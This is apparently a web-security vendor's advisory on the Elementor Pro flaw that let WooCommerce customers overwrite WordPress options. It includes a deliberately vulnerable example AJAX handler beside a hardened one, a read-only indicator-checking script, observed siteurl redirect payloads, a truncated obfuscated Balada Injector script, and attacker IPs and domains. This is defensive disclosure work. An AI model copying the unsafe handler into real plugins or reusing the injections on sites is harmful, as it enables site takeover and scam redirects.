On March 22nd, 2023 a security patch was issued for the popular website builder plugin Elementor Pro. Website administrators using this plugin should immediately patch to at least version 3.11.7 to avoid a potential website compromise.
The security issue is reported to affect only the Pro version of the plugin and not the free version hosted at wordpress.org.
The vulnerability allows authenticated users to arbitrarily change wp_options values within the database via the AJAX action of Elementor Pro working in conjunction with WooCommerce.
Since WooCommerce websites allow registration for customer accounts, any website with user registration enabled with the Elementor Pro plugin and WooCommerce installed is liable to be exploited if using the vulnerable version.
The plugin uses the update_option function, which WordPress provides to change website settings stored in the database; in this case it lets shop admins change some options within their site database. The vulnerability results from user input not being validated properly, and from the AJAX handler calling this function without checking that the caller is a high-privileged user.
When both the Elementor Pro and WooCommerce plugins are active (a rather common combination within WordPress websites) this can lead to arbitrary wp_options changes such as:
- siteurl value
- default user role
- user registration
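To make the flaw concrete, here is an added illustration of the pattern described above: a generic WordPress AJAX handler that writes options on behalf of any logged-in user, placed next to a hardened version. This is example code written for this article, not Elementor Pro's or WooCommerce's code, and the action names, option names and nonce name are hypothetical.

```php
<?php
// Added example of the vulnerable pattern, NOT code from Elementor Pro.
// Action name, option names and nonce action are assumptions for illustration.

// VULNERABLE pattern: wp_ajax_* hooks fire for every authenticated user, so a
// WooCommerce customer account reaches this handler. It trusts the posted option
// name and value and calls update_option() with no capability check and no nonce.
add_action( 'wp_ajax_example_save_setting', 'example_save_setting_unsafe' );
function example_save_setting_unsafe() {
    $name  = isset( $_POST['option_name'] )  ? $_POST['option_name']  : '';
    $value = isset( $_POST['option_value'] ) ? $_POST['option_value'] : '';
    // Any option can be overwritten here: siteurl, default_role, users_can_register ...
    update_option( $name, $value );
    wp_send_json_success();
}

// HARDENED version: verify a nonce, require a high-privilege capability, and
// accept only a fixed allowlist of option names, each with its own sanitizer.
add_action( 'wp_ajax_example_save_setting_safe', 'example_save_setting_safe' );
function example_save_setting_safe() {
    check_ajax_referer( 'example_save_setting', 'nonce' ); // stops execution on a bad nonce

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // Hypothetical plugin-owned options; core options such as siteurl are never writable here.
    $allowed = array(
        'example_shop_notice'    => 'sanitize_text_field',
        'example_items_per_page' => 'absint',
    );

    $name = isset( $_POST['option_name'] ) ? sanitize_key( $_POST['option_name'] ) : '';
    if ( ! array_key_exists( $name, $allowed ) ) {
        wp_send_json_error( 'option not permitted', 400 );
    }

    $raw   = isset( $_POST['option_value'] ) ? wp_unslash( $_POST['option_value'] ) : '';
    $value = call_user_func( $allowed[ $name ], $raw );
    update_option( $name, $value );
    wp_send_json_success( array( 'option' => $name ) );
}
```

The two checks that matter are current_user_can() and the allowlist: the first stops a customer account from reaching update_option() at all, and the second means that even an administrator session can only touch the options the feature actually owns, so a bug elsewhere cannot be turned into a siteurl or default_role rewrite.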
We have also observed multiple users reporting that their administrator user name was changed to firstname.lastname@example.org after this vulnerability was exploited on their website, as well as new administrator users added using the pattern wpnew_*** within the database.
Attacks often originate from the following IP addresses:
22.214.171.124 126.96.36.199 188.8.131.52
More in-depth technical details about the vulnerability can be found at Nintechnet where it was originally reported.
Malware campaign already active
The attackers have wasted no time in exploiting this vulnerability and we have already seen the beginnings of a mass-infection riding on the coattails of this vulnerability before website administrators have had the opportunity to update.
So far, the most common payload that we have observed has been for the attackers to replace the siteurl wp_option value with the following URL:
window.stop();var step = "hxxps://away[.]trackersline[.]com/away.php?id=43436-22-4734573234"; document.location.href=step; window.location.replace(step);
So far we have seen these injections redirect users to various sketchy websites via a long chain of hops which usually include koldasee[.]ru and domains like thebestprizes[.]life.
The final destination can be anything based on your location and browser – for example, a gambling site like this one:
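As an added example (not Sucuri's, Elementor's or WooCommerce's code), the following read-only script checks a site for the indicators described in this post: a siteurl or home option that no longer looks like a URL, registration opened with a non-default role, and administrator accounts using the wpnew_ prefix mentioned earlier. It is meant to be run with WP-CLI as `wp eval-file check-indicators.php` so that WordPress is loaded; the function name, file name and the regular expressions are my own assumptions.

```php
<?php
// Added example: read-only indicator check for the attack described in the article.
// Run under WP-CLI (wp eval-file check-indicators.php). Function name and regexes are
// assumptions; the wpnew_ prefix and the siteurl payload are taken from the article.

function example_check_indicators() {
    $findings = array();

    // 1. siteurl and home must be plain http(s) URLs. JavaScript statements or a
    //    <script tag inside either option match the redirect payload shown above.
    foreach ( array( 'siteurl', 'home' ) as $opt ) {
        $value = (string) get_option( $opt );
        if ( ! preg_match( '#^https?://[^\s<>"\']+$#i', $value )
             || preg_match( '/window\.|document\.|<script|\beval\(/i', $value ) ) {
            $findings[] = "option {$opt} looks tampered: " . substr( $value, 0, 120 );
        }
    }

    // 2. Open registration combined with a privileged default role is a typical
    //    follow-on change once an attacker can write arbitrary wp_options values.
    $default_role = (string) get_option( 'default_role' );
    if ( '1' === (string) get_option( 'users_can_register' ) && 'subscriber' !== $default_role ) {
        $findings[] = "registration is open and default_role is {$default_role}";
    }

    // 3. Administrator accounts following the wpnew_ naming pattern.
    $admins = get_users( array(
        'role'   => 'administrator',
        'fields' => array( 'ID', 'user_login', 'user_registered' ),
    ) );
    foreach ( $admins as $admin ) {
        if ( 0 === strpos( $admin->user_login, 'wpnew_' ) ) {
            $findings[] = "suspicious admin {$admin->user_login} (ID {$admin->ID}, created {$admin->user_registered})";
        }
    }

    return $findings;
}

$findings = example_check_indicators();
if ( empty( $findings ) ) {
    WP_CLI::success( 'no indicators found' );
} else {
    foreach ( $findings as $finding ) {
        WP_CLI::warning( $finding );
    }
}
```

The script only reads; it does not delete users or rewrite options, because an unexpected administrator account or a changed siteurl is evidence that should be recorded (creation date, user ID, the full option value) before the site is cleaned and the plugin is updated to 3.11.7 or later.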
This seems to be a continuation of the years-long malware campaign that we recently dubbed the “Balada Injector”, which we first started tracking in 2017. This malware is notorious for exploiting any and all vulnerable plugins or themes that it can identify, redirecting website visitors to scam and/or spam websites which often install adware or other potentially unwanted programs (PUPs) on users’ computers.
The trackersline[.]com domain was registered on the same day (Feb 15, 2023) and through the same registrar (ERANET INTERNATIONAL LIMITED) as the previous Balada Injector domain statisticline[.]com. The statisticline[.]com wave of the campaign is known for injections like this:
<script id='globalsway'>var z =String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101, …skipped… 112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(/*674867468*/t);</script>
Elementor Pro users should patch their software immediately to at least version 3.11.7 to mitigate risk. Our research team has also released an update to ensure that users of the Sucuri web application firewall are protected from this vulnerability.
This is a great reminder of why issuing software updates as soon as possible is crucial for website security and preventing attacks, and also that website administrators who employ automatic updates/patches are among the least at risk of compromise.